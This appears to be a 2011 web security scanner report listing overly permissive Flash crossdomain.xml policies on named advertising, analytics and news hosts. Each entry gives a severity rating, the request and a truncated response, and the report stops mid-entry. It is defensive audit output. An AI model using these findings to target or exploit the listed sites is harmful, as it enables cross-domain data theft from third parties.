GET /crossdomain.xml HTTP/1.0 Host: s0.2mdn.net |
HTTP/1.0 200 OK Vary: Accept-Encoding Content-Type: text/x-cross-domain Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT Date: Sat, 17 Sep 2011 02:43:00 GMT Expires: Sat, 17 Sep 2011 02:43:00 GMT X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 1; mode=block Age: 49828 Cache-Control: public, max-age=86400 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <!-- Policy file for http://www.doubleclick <cross-domain-policy> <site- ...[SNIP]... <allow-access-from domain="*" secure="false"/> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://sana.newsinc.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: sana.newsinc.com |
HTTP/1.0 200 OK Server: Apache ETag: "9a2df4412dfbe178fcc Last-Modified: Thu, 09 Jun 2011 17:42:59 GMT Accept-Ranges: bytes Content-Length: 335 Content-Type: application/xml Date: Sat, 17 Sep 2011 16:23:17 GMT Connection: close <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <site-control permitted-cross-domain ...[SNIP]... <allow-access-from domain="*"/> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://sb1.analogana |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: sb1.analoganalytics.com |
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Sat, 17 Sep 2011 16:25:01 GMT Content-Type: text/xml Content-Length: 259 Last-Modified: Sat, 17 Sep 2011 01:23:33 GMT Connection: close Accept-Ranges: bytes <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <site-control permitted-cross-domain ...[SNIP]... <allow-access-from domain="*"/> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://secure-us |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: secure-us.imrworldwide |
HTTP/1.1 200 OK Server: nginx Date: Sat, 17 Sep 2011 16:23:06 GMT Content-Type: text/xml Content-Length: 268 Last-Modified: Wed, 14 May 2008 01:55:09 GMT Connection: close Expires: Sat, 24 Sep 2011 16:23:06 GMT Cache-Control: max-age=604800 Accept-Ranges: bytes <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*"/> <site-control permi ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://sensor2.suitesmart |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: sensor2.suitesmart.com |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 16:39:52 GMT Server: Apache/2.2.3 (Red Hat) Last-Modified: Fri, 18 Feb 2011 18:15:01 GMT ETag: "1f00e1-c9-49c927e105340" Accept-Ranges: bytes Content-Length: 201 Connection: close Content-Type: text/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-policy ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://shadow01 |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: shadow01.yumenetworks.com |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 16:46:33 GMT Server: Apache/2.2.13 (Unix) mod_ssl/2.2.13 OpenSSL/0.9.8e-fips-rhel5 DAV/2 Last-Modified: Fri, 12 Mar 2010 23:37:01 GMT ETag: "12a8464-122-481a302 Accept-Ranges: bytes Content-Length: 290 P3P: policyref="http://qa-web Access-Control-Allow Connection: close Content-Type: application/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" secure="false" /> <allo ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://spe.atdmt.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: spe.atdmt.com |
HTTP/1.0 200 OK Content-Type: text/xml Content-Length: 207 Allow: GET Expires: Thu, 22 Sep 2011 14:59:07 GMT Date: Sat, 17 Sep 2011 16:39:32 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-po ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://studio-5 |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: studio-5.financialcontent |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 16:23:16 GMT Server: nginx/0.8.15 Content-Type: text/html; charset=UTF-8 P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Last-Modified: Sat, 17 Sep 2011 16:23:16 GMT X-Cache: MISS from squid1.sv1.financial X-Cache-Lookup: MISS from squid1.sv1.financial Via: 1.0 squid1.sv1.financial Vary: Accept-Encoding Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-poli ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://t.invitemedia.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: t.invitemedia.com |
HTTP/1.0 200 OK Server: IM BidManager Date: Sat, 17 Sep 2011 16:24:45 GMT Content-Type: text/plain Content-Length: 81 <cross-domain-policy> <allow-access-from domain="*"/> </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://tags.bluekai.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: tags.bluekai.com |
HTTP/1.0 200 OK Date: Sat, 17 Sep 2011 16:38:13 GMT Server: Apache/2.2.3 (CentOS) Last-Modified: Wed, 29 Jun 2011 21:44:06 GMT ETag: "6803d3-ca-4a6e0af03f580" Accept-Ranges: bytes Content-Length: 202 Content-Type: text/xml Connection: close <cross-domain-policy> <allow-access-from domain="*" to-ports="*"/> <site-control permitted-cross-domain <allow-http-request </cross-domain-policy ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://tcr.tynt.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: tcr.tynt.com |
HTTP/1.0 200 OK Accept-Ranges: bytes Cache-Control: max-age=1800 Content-Type: text/xml Date: Sat, 17 Sep 2011 16:27:03 GMT ETag: "251523935" Expires: Sat, 17 Sep 2011 16:57:03 GMT Last-Modified: Tue, 10 Nov 2009 16:25:33 GMT Server: EOS (lax001/54D6) X-Cache: HIT Content-Length: 201 Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-policy> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://um.simpli.fi |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: um.simpli.fi |
HTTP/1.1 200 OK Server: nginx Date: Sat, 17 Sep 2011 16:30:28 GMT Content-Type: text/xml Content-Length: 102 Last-Modified: Thu, 24 Feb 2011 21:07:44 GMT Connection: close Accept-Ranges: bytes <?xml version="1.0" ?> <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://video.od |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: video.od.visiblemeasures |
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Sat, 17 Sep 2011 16:30:16 GMT Content-Type: text/xml Content-Length: 169 Last-Modified: Thu, 24 Feb 2011 08:23:29 GMT Connection: close Accept-Ranges: bytes <?xml version="1.0"?> <cross-domain-policy> <allow-access-from domain="*" /> <site-control permitted-cross-domain </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://vms.msn.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: vms.msn.com |
HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Tue, 06 Oct 2009 22:14:14 GMT Accept-Ranges: bytes ETag: "0bf6456d246ca1:0" Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Sat, 17 Sep 2011 16:30:26 GMT Connection: keep-alive Content-Length: 205 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-po ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://widget.newsinc.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: widget.newsinc.com |
HTTP/1.1 200 OK x-amz-id-2: q02txhWIcnhAGraWBeef x-amz-request-id: E031A467F2F35EF5 Date: Sat, 17 Sep 2011 16:23:08 GMT Last-Modified: Mon, 26 Oct 2009 18:54:37 GMT ETag: "9a2df4412dfbe178fcc Accept-Ranges: bytes Content-Type: text/xml Content-Length: 335 Connection: keep-alive Server: AmazonS3 <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <site-control permitted-cross-domain ...[SNIP]... <allow-access-from domain="*"/> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.burstnet.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.burstnet.com |
HTTP/1.0 200 OK Server: Apache (Unix) P3P: policyref="http://www Last-Modified: Tue, 30 Aug 2011 17:48:00 GMT ETag: "596a1b-66-4e5d2250" Accept-Ranges: bytes Content-Length: 102 Content-Type: text/xml Date: Sat, 17 Sep 2011 16:43:42 GMT Connection: close Set-Cookie: 56Q8=0; expires=Wed, 22-Aug-2001 17:30:00 GMT; path=/; domain=.www.burstnet.com <?xml version="1.0"?> <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://www.casalemedia |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.casalemedia.com |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 16:43:49 GMT Server: Apache Last-Modified: Fri, 09 Sep 2011 19:37:20 GMT ETag: "430003-e6-4e3c9c00" Accept-Ranges: bytes Content-Length: 230 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <!-- Casale Media --> <cross-domain-policy> <allow-access-from domain="*" /> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.kaboodle.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.kaboodle.com |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 ETag: W/"200-1315340584000" Last-Modified: Tue, 06 Sep 2011 20:23:04 GMT Content-Type: application/xml Content-Length: 200 Date: Sat, 17 Sep 2011 16:30:31 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://www.nexac.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.nexac.com |
HTTP/1.0 200 OK Connection: close Expires: Wed Sep 15 09:14:42 MDT 2010 Pragma: no-cache P3P: policyref="http://www Set-Cookie: na_tc=Y; expires=Thu,12-Dec-2030 22:00:00 GMT; domain=.nexac.com; path=/ Content-Type: text/xml Accept-Ranges: bytes ETag: "3835246478" Last-Modified: Fri, 22 Jul 2011 16:11:25 GMT Content-Length: 201 Date: Sat, 17 Sep 2011 16:44:23 GMT Server: lighttpd/1.4.18 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-policy> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.zvents.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.zvents.com |
HTTP/1.0 200 OK Server: nginx/0.6.39 Date: Fri, 16 Sep 2011 23:42:02 GMT Content-Type: text/xml Last-Modified: Thu, 26 May 2011 23:14:54 GMT Expires: Sat, 17 Sep 2011 23:42:02 GMT Cache-Control: max-age=86400 Age: 60070 X-Cache: HIT from squid1.admin.zvents.com X-Cache-Lookup: HIT from squid1.admin.zvents.com Via: 1.0 squid1.admin.zvents.com (squid/3.1.4) Proxy-Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-policy> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www2.glam.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www2.glam.com |
HTTP/1.0 200 OK Server: Apache/2.2.3 (CentOS) Last-Modified: Thu, 16 Sep 2010 21:08:11 GMT ETag: "3d38003-cc-49066d7f404c0 Accept-Ranges: bytes Content-Length: 204 Content-Type: text/xml Date: Sat, 17 Sep 2011 16:45:50 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-policy ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://y.timesunion.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: y.timesunion.com |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 16:23:23 GMT Server: Omniture DC/2.0.0 xserver: www423 Connection: close Content-Type: text/html <cross-domain-policy> <allow-access-from domain="*" /> <allow-http-request </cross-domain-policy> |
Severity: | Low |
Confidence: | Certain |
Host: | http://ad.wsod.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: ad.wsod.com |
HTTP/1.1 200 OK Server: nginx Date: Sat, 17 Sep 2011 16:45:01 GMT Content-Type: text/xml Connection: close Last-Modified: Tue, 16 Feb 2010 21:38:42 GMT ETag: "377fa7-20a-47fbe8ebb5c80 Accept-Ranges: bytes Content-Length: 522 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-http-request ...[SNIP]... <allow-access-from domain="*.wsod.com" secure="false" /> ...[SNIP]... <allow-access-from domain="*.wallst.com" secure="false" /> ...[SNIP]... <allow-access-from domain="*.wsodqa.com" secure="false" /> ...[SNIP]... <allow-access-from domain="*.msn.com" secure="false" /> ...[SNIP]... <allow-access-from domain="*.msads.net" secure="false" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://ads.adbrite.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: ads.adbrite.com |
HTTP/1.0 200 OK Accept-Ranges: none Content-Type: text/x-cross-domain Date: Sat, 17 Sep 2011 16:33:10 GMT Server: XPEHb/1.0 Content-Length: 398 Connection: close <?xml version="1.0" encoding="UTF-8"?> <!-- AdBrite crossdomain.xml for BritePic and BriteFlic --> <cross-domain-policy> <allow-access-from domain="*.adbrite.com" secure="true" /> <allow-access-from domain="www.adbrite.com" secure="true" /> ...[SNIP]... <allow-access-from domain="*.britepic.com" secure="true" /> ...[SNIP]... <allow-access-from domain="www.britepic.com" secure="true" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://as.serving-sys.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: as.serving-sys.com |
HTTP/1.1 200 OK Connection: close Content-Length: 116 Content-Type: text/xml Last-Modified: Wed, 25 Jun 2008 14:19:50 GMT Accept-Ranges: bytes ETag: "94b48487ced6c81:74654" P3P: policyref=http://www X-UA-Compatible: IE=EmulateIE8 <cross-domain-policy> <allow-access-from domain="*.serving-sys.com" secure="false" /> </cross-domain-policy> |
Severity: | Low |
Confidence: | Certain |
Host: | http://cim.meebo.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: cim.meebo.com |
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 17 Sep 2011 16:34:34 GMT Content-Type: text/xml; charset=utf-8 Content-Length: 303 Last-Modified: Tue, 09 Aug 2011 21:34:10 GMT Connection: close Accept-Ranges: bytes <cross-domain-policy> <allow-access-from domain="www.meebo.com"/> <allow-access-from domain="*.meebo.com"/> <allow-access-from domain="meebo.com"/> <allow-access-from domain="*.meebome.com"/> <allow-access-from domain="www.meebome.com"/> <allow-access-from domain="meebome.com"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://cm.npc-hearst |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: cm.npc-hearst.overture |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 16:23:04 GMT P3P: policyref="http://info Last-Modified: Tue, 03 May 2011 10:14:38 GMT Accept-Ranges: bytes Content-Length: 639 Connection: close Content-Type: application/xml <?xml version="1.0" ?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="stage.mce.media.yahoo.com" secure="false" /> ...[SNIP]... <allow-access-from domain="mce.media.yahoo.com" secure="false" /> ...[SNIP]... <allow-access-from domain="*.yahoo.com" /> <allow-access-from domain="*.broadcast.com" /> <allow-access-from domain="*.launch.com" /> <allow-access-from domain="*.hotjobs.com" /> <allow-access-from domain="*.yimg.com" /> <allow-access-from domain="*.yahooligans.com" /> <allow-access-from domain="*.overture.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://extras.seattlepi |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: extras.seattlepi.com |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 16:24:11 GMT Server: Apache/2.2.3 (Red Hat) Last-Modified: Mon, 11 Apr 2011 21:18:53 GMT ETag: "57e6d-a5-4a0ab1f5ec940" Accept-Ranges: bytes Content-Length: 165 Content-Type: text/xml Cache-Control: no-store Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Connection: close <?xml version="1.0"?> <!-- http://www.adobe.com <cross-domain-policy> <allow-access-from domain="*.seattlepi.com" /> </cross-domain-policy> |
Severity: | Low |
Confidence: | Certain |
Host: | http://fetchback.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: fetchback.com |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 17:18:27 GMT Server: Apache/2.2.3 (Red Hat) Last-Modified: Fri, 30 Apr 2010 21:39:42 GMT Accept-Ranges: bytes Content-Length: 328 Cache-Control: max-age=0 Expires: Sat, 17 Sep 2011 17:18:27 GMT Connection: close Content-Type: text/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <!-- Begin FetchBack Cross Domain Policy Entry --> <allow-access-from domain="*.fetchback.com" to-ports="80" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://googleads.g |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: googleads.g.doubleclick |
HTTP/1.0 200 OK P3P: policyref="http:/ Content-Type: text/x-cross-domain Last-Modified: Thu, 15 Sep 2011 22:33:08 GMT Date: Sat, 17 Sep 2011 04:47:56 GMT Expires: Sun, 18 Sep 2011 04:47:56 GMT X-Content-Type-Options: nosniff Server: cafe X-XSS-Protection: 1; mode=block Age: 42499 Cache-Control: public, max-age=86400 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="maps.gstatic.com" /> <allow-access-from domain="maps.gstatic.cn" /> <allow-access-from domain="*.googlesyndication.com" /> <allow-access-from domain="*.google.com" /> <allow-access-from domain="*.google.ae" /> <allow-access-from domain="*.google.at" /> <allow-access-from domain="*.google.be" /> <allow-access-from domain="*.google.ca" /> <allow-access-from domain="*.google.ch" /> <allow-access-from domain="*.google.cn" /> <allow-access-from domain="*.google.co.il" /> <allow-access-from domain="*.google.co.in" /> <allow-access-from domain="*.google.co.jp" /> <allow-access-from domain="*.google.co.kr" /> <allow-access-from domain="*.google.co.nz" /> <allow-access-from domain="*.google.co.uk" /> <allow-access-from domain="*.google.co.ve" /> <allow-access-from domain="*.google.co.za" /> <allow-access-from domain="*.google.com.ar" /> <allow-access-from domain="*.google.com.au" /> <allow-access-from domain="*.google.com.br" /> <allow-access-from domain="*.google.com.gr" /> <allow-access-from domain="*.google.com.hk" /> <allow-access-from domain="*.google.com.ly" /> <allow-access-from domain="*.google.com.mx" /> <allow-access-from domain="*.google.com.my" /> <allow-access-from domain="*.google.com.pe" /> <allow-access-from domain="*.google.com.ph" /> <allow-access-from domain="*.google.com.pk" /> <allow-access-from domain="*.google.com.ru" /> <allow-access-from domain="*.google.com.sg" /> <allow-access-from domain="*.google.com.tr" /> <allow-access-from domain="*.google.com.tw" /> <allow-access-from domain="*.google.com.ua" /> <allow-access-from domain="*.google.com.vn" /> <allow-access-from domain="*.google.de" /> <allow-access-from domain="*.google.dk" /> <allow-access-from domain="*.google.es" /> <allow-access-from domain="*.google.fi" /> <allow-access-from domain="*.google.fr" /> <allow-access-from domain="*.google.it" /> <allow-access-from domain="*.google.lt" /> <allow-access-from domain="*.google.lv" /> <allow-access-from domain="*.google.nl" /> <allow-access-from domain="*.google.no" /> <allow-access-from domain="*.google.pl" /> <allow-access-from domain="*.google.pt" /> <allow-access-from domain="*.google.ro" /> <allow-access-from domain="*.google.se" /> <allow-access-from domain="*.google.sk" /> <allow-access-from domain="*.youtube.com" /> <allow-access-from domain="*.ytimg.com" /> <allow-access-from domain="*.2mdn.net" /> <allow-access-from domain="*.doubleclick.net" /> <allow-access-from domain="*.doubleclick.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://login.dotomi.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: login.dotomi.com |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 17:24:02 GMT Server: Apache/2.2.20 (Unix) mod_ssl/2.2.20 OpenSSL/0.9.8e-fips-rhel5 DAV/2 X-Name: dmc-s02 Last-Modified: Tue, 08 Sep 2009 04:16:43 GMT ETag: "80cf215-a1-473093bdbc0c0 Accept-Ranges: bytes Content-Length: 161 Connection: close Content-Type: application/xml <?xml version="1.0"?> <!-- http://*.dotomi.com <cross-domain-policy> <allow-access-from domain="*.dotomi.com" /> </cross-domain-policy> |
Severity: | Low |
Confidence: | Certain |
Host: | http://o.aolcdn.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: o.aolcdn.com |
HTTP/1.0 200 OK Server: Apache ETag: "86252e13a238a19354a Last-Modified: Tue, 04 Jan 2011 16:25:41 GMT Content-Type: application/xml Cache-Control: max-age=1198014 Expires: Sat, 01 Oct 2011 14:22:26 GMT Date: Sat, 17 Sep 2011 17:35:32 GMT Content-Length: 3059 Connection: close <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy xmlns:xsi="http://www.w3 ...[SNIP]... <allow-access-from domain="*.aol.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.*.aol.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.channels.aol.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.web.aol.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.my.aol.com" secure="false"/> ...[SNIP]... <allow-access-from domain="channelevents.estage.aol ...[SNIP]... <allow-access-from domain="channelevents.aol.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.office.aol.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.channel.aol.com" secure="false"/> ...[SNIP]... <allow-access-from domain="cdn-startpage.aol.com" secure="false"/> ...[SNIP]... <allow-access-from domain="startpage.aol.com" secure="false"/> ...[SNIP]... <allow-access-from domain="cdn.digitalcity.com" secure="false"/> ...[SNIP]... <allow-access-from domain="progressive.stream.aol ...[SNIP]... <allow-access-from domain="*.video.aol.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.video.office.aol.com" secure="false"/> ...[SNIP]... <allow-access-from domain="publishing.aol.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.publishing.aol.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.aolcdn.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.tmz.com" secure="false"/> ...[SNIP]... <allow-access-from domain="tmz.warnerbros.com" secure="false"/> ...[SNIP]... <allow-access-from domain="goldrush.aol.com" to-ports="80"/> ...[SNIP]... <allow-access-from domain="stage.goldrush.aol.com" to-ports="80"/> ...[SNIP]... <allow-access-from domain="*.facebook.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.pointroll.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.pointroll.net" secure="false"/> ...[SNIP]... <allow-access-from domain="*.platformaprojects.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.digitas.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.yourminis.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.brightcove.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.lightningcast.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.lightningcast.net" secure="false"/> ...[SNIP]... <allow-access-from domain="*.adtechus.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.atwola.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.rtm.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.advertising.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.ad-preview.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.domanistudios.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.*.domanistudios.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.icq.com" secure="false"/> ...[SNIP]... <allow-access-from domain="studionow.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.studionow.com" secure="false"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://open.ad.yield |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: open.ad.yieldmanager.net |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 16:23:04 GMT P3P: policyref="http://info Last-Modified: Thu, 03 Feb 2011 22:39:36 GMT Accept-Ranges: bytes Content-Length: 1548 Connection: close Content-Type: application/xml <?xml version="1.0" ?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy xmlns:xsi="http://www.w3 ...[SNIP]... <allow-access-from domain="*.sueddeutsche.de" /> <allow-access-from domain="*.ooyala.com" /> <allow-access-from domain="*.cbs.com" /> <allow-access-from domain="*.fwmrm.net" /> <allow-access-from domain="*.auditude.com" /> <allow-access-from domain="*.brightcove.com" /> <allow-access-from domain="*.mavenapps.net" /> <allow-access-from domain="*.maventechnologies.com" /> <allow-access-from domain="*.grindtv.com" /> <allow-access-from domain="*.vipix.com" /> <allow-access-from domain="*.maven.net" /> <allow-access-from domain="*.mlb.com" /> <allow-access-from domain="*.broadcast.com" /> <allow-access-from domain="*.comcast.net" /> <allow-access-from domain="*.comcastonline.com" /> <allow-access-from domain="*.flickr.com" /> <allow-access-from domain="*.hotjobs.com" /> <allow-access-from domain="*.launch.com" /> <allow-access-from domain="*.overture.com" /> <allow-access-from domain="*.rivals.com" /> <allow-access-from domain="*.scrippsnewspapers.com" /> <allow-access-from domain="*.vmixcore.com" /> <allow-access-from domain="*.vmix.com" /> <allow-access-from domain="*.yahoo.com" /> <allow-access-from domain="*.yahooligans.com" /> <allow-access-from domain="*.yimg.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://origin.chron.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: origin.chron.com |
HTTP/1.0 200 OK Connection: close Content-Type: text/xml Accept-Ranges: bytes ETag: "-457581153" Last-Modified: Tue, 24 Apr 2007 18:10:28 GMT Content-Length: 415 Date: Sat, 17 Sep 2011 16:23:27 GMT Server: lighttpd/1.4.19 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.chron.com" /> <allow-access-from domain="images.chron.com" /> <allow-access-from domain="chron.com" /> <allow-access-from domain="*.houstonchronicle.com" /> <allow-access-from domain="houstonchronicle.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://p.opt.fimserve.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: p.opt.fimserve.com |
